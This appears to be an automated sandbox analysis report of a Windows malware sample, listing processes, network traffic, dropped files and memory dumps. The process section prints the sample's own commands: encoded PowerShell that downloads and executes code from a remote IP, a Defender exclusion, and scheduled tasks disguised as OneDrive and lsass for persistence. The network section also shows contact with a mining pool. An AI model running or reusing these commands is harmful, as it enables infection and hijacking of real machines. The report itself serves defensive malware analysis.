PID 1252 wrote to memory of 640 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\cmd.exe
PID 1252 wrote to memory of 640 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\cmd.exe
PID 640 wrote to memory of 2804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 640 wrote to memory of 2804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 640 wrote to memory of 2804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4944 wrote to memory of 4340 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe
PID 4944 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe

"C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Users\Admin\AppData\Roaming\OneDrive.exe

"C:\Users\Admin\AppData\Roaming\OneDrive.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1656 -ip 1656

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1656 -s 1512

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Roaming\dllhost.exe

"C:\Users\Admin\AppData\Roaming\dllhost.exe"

C:\Users\Admin\AppData\Roaming\lsass.exe

"C:\Users\Admin\AppData\Roaming\lsass.exe"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "OneDrive"

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" /st 00:50 /du 23:59 /sc daily /ri 1 /f

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\ProgramData\lsass\lsass.exe

"C:\ProgramData\lsass\lsass.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp635.tmp.bat""

C:\Windows\SysWOW64\timeout.exe

timeout 7

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
NL 8.238.177.126:80 tcp
US 20.189.173.12:443 tcp
US 40.125.122.176:443 tcp
RU 62.204.41.23:80 62.204.41.23 tcp
RU 62.204.41.23:80 62.204.41.23 tcp
RU 62.204.41.23:80 62.204.41.23 tcp
US 8.8.8.8:53 63.13.109.52.in-addr.arpa udp
US 8.8.8.8:53 23.41.204.62.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:80 ipinfo.io tcp
US 93.184.220.29:80 tcp
NL 8.238.177.126:80 tcp
US 40.125.122.176:443 tcp
N/A 185.161.248.16:26885 tcp
US 8.8.8.8:53 16.248.161.185.in-addr.arpa udp
US 40.125.122.176:443 tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 maper.info udp
DE 148.251.234.93:443 maper.info tcp
US 8.8.8.8:53 93.234.251.148.in-addr.arpa udp
US 40.125.122.176:443 tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 40.125.122.176:443 tcp
US 8.8.8.8:53 123.108.74.40.in-addr.arpa udp
US 40.125.122.176:443 tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp

Files

memory/2088-133-0x0000000000B40000-0x0000000000B66000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ysbp1hsy.wnp.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1116-142-0x000001BA61460000-0x000001BA61482000-memory.dmp

memory/1116-173-0x000001BA614B0000-0x000001BA614C0000-memory.dmp

memory/4472-172-0x000002DBF6100000-0x000002DBF6110000-memory.dmp

memory/548-176-0x0000016D98820000-0x0000016D98830000-memory.dmp

memory/5104-177-0x000002070F040000-0x000002070F050000-memory.dmp

memory/5104-175-0x000002070F040000-0x000002070F050000-memory.dmp

memory/548-178-0x0000016D98820000-0x0000016D98830000-memory.dmp

memory/4472-174-0x000002DBF6100000-0x000002DBF6110000-memory.dmp

memory/4472-179-0x000002DBF6100000-0x000002DBF6110000-memory.dmp

memory/1116-180-0x000001BA614B0000-0x000001BA614C0000-memory.dmp

memory/1656-183-0x0000000000400000-0x000000000040C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5fe0ce98e33b4a45e2a796ef1be2d16c
SHA1 1034ce2655e8cc47127e6c3f1bd7495fb5906cdd
SHA256 984ad046f9526683451b296135ef4e10679359043e8513a3d7c035b0ade4686e
SHA512 d7a4fcf2563b8be2b95b839ba41d5980936176c15f9b99cbe5bc7e1be5692cb45317c1a035bc153800f02003f588b0205ffcb671e1a7c59fca178f5a549f0783

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/1656-188-0x0000000005790000-0x00000000057F6000-memory.dmp

memory/1656-189-0x00000000058A0000-0x000000000593C000-memory.dmp

memory/1656-190-0x0000000005800000-0x0000000005866000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c99bf984470b50d6d6d1bc428350c588
SHA1 977b213e51f6295dabdcb1ebe9c86fd8e6fef87b
SHA256 bb87529d81e5a91b8c6cbf2e0b8da19b7c0142fd6c0f541deadbe0551d280a31
SHA512 e2ccc419eec7002cf53f543f4e83b71556465c456662a0669594b67a979383c37dda636df84e99abb1883d2795810d49a46ac1677e23e2ac9d5336edfb3ab09d

memory/324-191-0x0000000000400000-0x0000000000430000-memory.dmp

memory/1656-195-0x0000000005E50000-0x0000000005E60000-memory.dmp

memory/1116-196-0x000001BA614B0000-0x000001BA614C0000-memory.dmp

memory/1116-197-0x000001BA614B0000-0x000001BA614C0000-memory.dmp

memory/1116-198-0x000001BA614B0000-0x000001BA614C0000-memory.dmp

memory/1656-200-0x0000000005E50000-0x0000000005E60000-memory.dmp

memory/324-203-0x000000000ABA0000-0x000000000B1B8000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/324-206-0x000000000A690000-0x000000000A79A000-memory.dmp

memory/324-207-0x0000000005140000-0x0000000005152000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/324-210-0x000000000A580000-0x000000000A5BC000-memory.dmp

memory/324-211-0x00000000051C0000-0x00000000051D0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c99bf984470b50d6d6d1bc428350c588
SHA1 977b213e51f6295dabdcb1ebe9c86fd8e6fef87b
SHA256 bb87529d81e5a91b8c6cbf2e0b8da19b7c0142fd6c0f541deadbe0551d280a31
SHA512 e2ccc419eec7002cf53f543f4e83b71556465c456662a0669594b67a979383c37dda636df84e99abb1883d2795810d49a46ac1677e23e2ac9d5336edfb3ab09d

memory/4632-224-0x000001DA760B0000-0x000001DA760C0000-memory.dmp

memory/4632-225-0x000001DA760B0000-0x000001DA760C0000-memory.dmp

memory/4632-226-0x000001DA760B0000-0x000001DA760C0000-memory.dmp

memory/3968-227-0x00007FF7D26A0000-0x00007FF7D306A000-memory.dmp

memory/324-228-0x00000000051C0000-0x00000000051D0000-memory.dmp

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 888bfc5a63177bdc5aaa1429eca8e632
SHA1 3eca9ed178f35a94524a17356a60702d8d5d2e69
SHA256 fc233bc51158c9250a005cab1d7e3b200722a675e392e799b11a5eef6503339c
SHA512 c95f454d559038393d55a7afc889e675ede6a8f5cdecf238f5b09ce8e0a88adc4c7e1d711c3c23469e086fe4e7beb6655b1810a5b085b137495c8db4890749ac

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 888bfc5a63177bdc5aaa1429eca8e632
SHA1 3eca9ed178f35a94524a17356a60702d8d5d2e69
SHA256 fc233bc51158c9250a005cab1d7e3b200722a675e392e799b11a5eef6503339c
SHA512 c95f454d559038393d55a7afc889e675ede6a8f5cdecf238f5b09ce8e0a88adc4c7e1d711c3c23469e086fe4e7beb6655b1810a5b085b137495c8db4890749ac

memory/4632-236-0x000001DA760B0000-0x000001DA760C0000-memory.dmp

memory/4632-237-0x000001DA760B0000-0x000001DA760C0000-memory.dmp

memory/3892-238-0x0000000000400000-0x000000000058B000-memory.dmp

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 888bfc5a63177bdc5aaa1429eca8e632
SHA1 3eca9ed178f35a94524a17356a60702d8d5d2e69
SHA256 fc233bc51158c9250a005cab1d7e3b200722a675e392e799b11a5eef6503339c
SHA512 c95f454d559038393d55a7afc889e675ede6a8f5cdecf238f5b09ce8e0a88adc4c7e1d711c3c23469e086fe4e7beb6655b1810a5b085b137495c8db4890749ac

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

memory/1252-250-0x0000000000F10000-0x0000000001330000-memory.dmp

memory/1252-251-0x0000000000F10000-0x0000000001330000-memory.dmp

memory/1252-253-0x0000000006DB0000-0x0000000007354000-memory.dmp

memory/1252-252-0x0000000000F10000-0x0000000001330000-memory.dmp

memory/1252-254-0x00000000068A0000-0x0000000006932000-memory.dmp

memory/4632-255-0x000001DA760B0000-0x000001DA760C0000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/3968-259-0x00007FF7D26A0000-0x00007FF7D306A000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5ef8878725b6933615098fa18735c998
SHA1 e7f309c1a261ebe11ecdacef018399b89e9163ef
SHA256 16106040f8518b4796d560e5d5ed1a95a4ef6ec3d937cb6ae6c03a3c4d31d7db
SHA512 d461500a84b8bef9d4331e78bbaaa974492b4cc1e1031ebbe2ac996ae6d0d6789c053f9737cc77f440cb72c1238a917b55467d464249ed305168d5982196e518

memory/324-272-0x000000000AB00000-0x000000000AB76000-memory.dmp

memory/1168-277-0x0000023BDBB80000-0x0000023BDBB90000-memory.dmp

memory/1168-275-0x0000023BDBB80000-0x0000023BDBB90000-memory.dmp

memory/1168-278-0x0000023BDBB80000-0x0000023BDBB90000-memory.dmp

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5d2242ff9dc07b67553123b3c939974d
SHA1 ec7b42a468cdb04f1403cd18f67aa4d5af6c5a7f
SHA256 27845ed84cb47c4ba2883bdd75c0a0be7035060f6ac845ca256a391bee640716
SHA512 25b081ed892b9bc03a7f77c16d110fdc8f03d118689f9773fff258e78a65c0e94c01886e01a4ba0cf5cb7bdb0d7e1e1babb58e1db4ba2582a4e1125b80ebd0ee

memory/1696-291-0x0000000000920000-0x0000000000D40000-memory.dmp

memory/1696-293-0x0000000000920000-0x0000000000D40000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp635.tmp.bat

MD5 c3dd234ae1296e33130c940682bfcc40
SHA1 cdc9c01ce27c8263d65f4b0373c40f3906aabe29
SHA256 6f31dd824daa36bbfa2ab450fb2785124dd303697fafa7559ba3e5dc9001318c
SHA512 e8daa4199d55a03e110328b631b6b1a88f776d10ad2b9a6440d2e98b4824e3eed07884d4467edbab1bc2eb473dc19007ce07c6afe1663d2770c71f0d50769682

memory/1252-295-0x0000000000F10000-0x0000000001330000-memory.dmp

memory/1696-296-0x0000000000920000-0x0000000000D40000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/2628-302-0x0000022A0AF00000-0x0000022A0AF20000-memory.dmp

memory/4944-301-0x00007FF7183E0000-0x00007FF718DAA000-memory.dmp

memory/3892-303-0x0000000000400000-0x000000000058B000-memory.dmp

memory/1696-304-0x0000000006740000-0x000000000674A000-memory.dmp

memory/1696-305-0x0000000000920000-0x0000000000D40000-memory.dmp

memory/4340-306-0x00007FF6DA720000-0x00007FF6DA749000-memory.dmp

memory/2628-307-0x00007FF7D3ED0000-0x00007FF7D46BF000-memory.dmp

memory/324-309-0x000000000BE60000-0x000000000C022000-memory.dmp

memory/324-310-0x000000000C560000-0x000000000CA8C000-memory.dmp

memory/2628-311-0x0000022A9D440000-0x0000022A9D480000-memory.dmp

memory/1696-312-0x0000000000920000-0x0000000000D40000-memory.dmp

memory/4340-313-0x00007FF6DA720000-0x00007FF6DA749000-memory.dmp

memory/2628-314-0x00007FF7D3ED0000-0x00007FF7D46BF000-memory.dmp

memory/1696-316-0x0000000000920000-0x0000000000D40000-memory.dmp

memory/2628-318-0x00007FF7D3ED0000-0x00007FF7D46BF000-memory.dmp

memory/324-319-0x000000000D200000-0x000000000D250000-memory.dmp

memory/1696-322-0x0000000000920000-0x0000000000D40000-memory.dmp

memory/2628-324-0x00007FF7D3ED0000-0x00007FF7D46BF000-memory.dmp

memory/2628-326-0x0000022A0AF70000-0x0000022A0AF90000-memory.dmp

memory/1696-327-0x0000000000920000-0x0000000000D40000-memory.dmp

memory/2628-329-0x00007FF7D3ED0000-0x00007FF7D46BF000-memory.dmp

memory/2628-331-0x0000022A0AF70000-0x0000022A0AF90000-memory.dmp

memory/1696-332-0x0000000000920000-0x0000000000D40000-memory.dmp

memory/2628-334-0x00007FF7D3ED0000-0x00007FF7D46BF000-memory.dmp

memory/1696-336-0x0000000000920000-0x0000000000D40000-memory.dmp

memory/2628-339-0x00007FF7D3ED0000-0x00007FF7D46BF000-memory.dmp

memory/1696-340-0x0000000000920000-0x0000000000D40000-memory.dmp

memory/2628-342-0x00007FF7D3ED0000-0x00007FF7D46BF000-memory.dmp

memory/1696-344-0x0000000000920000-0x0000000000D40000-memory.dmp

memory/2628-346-0x00007FF7D3ED0000-0x00007FF7D46BF000-memory.dmp